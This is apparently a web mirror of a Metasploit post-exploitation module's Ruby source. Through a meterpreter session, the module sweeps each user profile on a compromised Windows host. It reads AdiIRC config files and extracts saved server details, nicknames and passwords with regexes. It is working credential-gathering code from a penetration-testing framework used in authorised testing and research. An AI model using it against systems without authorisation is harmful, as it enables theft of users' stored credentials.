Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/adi_irc.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  ARTIFACTS =

11
    {

12
      application: 'Adi IRC',

13
      app_category: 'IRC',

14
      gatherable_artifacts: [

15
        {

16
          filetypes: 'quick_connect',

17
          path: 'LocalAppData',

18
          dir: 'AdiIRC',

19
          artifact_file_name: 'config',

20
          description: 'Quick Connect Server Details',

21
          credential_type: 'text',

22
          regex_search: [

23
            {

24
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

25
              extraction_type: 'credentials',

26
              regex: [

27
                '(?i-mx:Serverhost=.*)',

28
                '(?i-mx:Serverport=.*)',

29
                '(?i-mx:Usernick=.*)',

30
                '(?i-mx:QuickPassword=.*)'

31
              ]

32
            }

33
          ]

34
        },

35
        {

36
          filetypes: 'Networks',

37
          path: 'LocalAppData',

38
          dir: 'AdiIRC',

39
          artifact_file_name: 'networks',

40
          description: 'Saved Networks',

41
          credential_type: 'text'

42
        }

43
      ]

44
    }.freeze

45


46
  def initialize(info = {})

47
    super(

48
      update_info(

49
        info,

50
        'Name' => 'Adi IRC Credential Gatherer',

51
        'Description' => %q{

52
          This module searches for credentials stored on AdiIRC Client on a Windows host.

53
        },

54
        'License' => MSF_LICENSE,

55
        'Author' => [

56
          'Jacob Tierney',

57
          'Kazuyoshi Maruta',

58
          'Daniel Hallsworth',

59
          'Barwar Salim M',

60
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

61
        ],

62
        'Platform' => ['win'],

63
        'SessionTypes' => ['meterpreter'],

64
        'Notes' => {

65
          'Stability' => [CRASH_SAFE],

66
          'Reliability' => [],

67
          'SideEffects' => []

68
        }

69
      )

70
    )

71


72
    register_options(

73
      [

74
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

75
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

76
        # enumerates the options based on the artifacts that are defined below

77
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

78
      ]

79
    )

80
  end

81


82
  def run

83
    print_status('Filtering based on these selections:  ')

84
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

85
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

86
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

87


88
    # used to grab files for each user on the remote host

89
    grab_user_profiles.each do |userprofile|

90
      run_packrat(userprofile, ARTIFACTS)

91
    end

92


93
    print_status 'PackRat credential sweep completed'

94
  end

95
end

96


97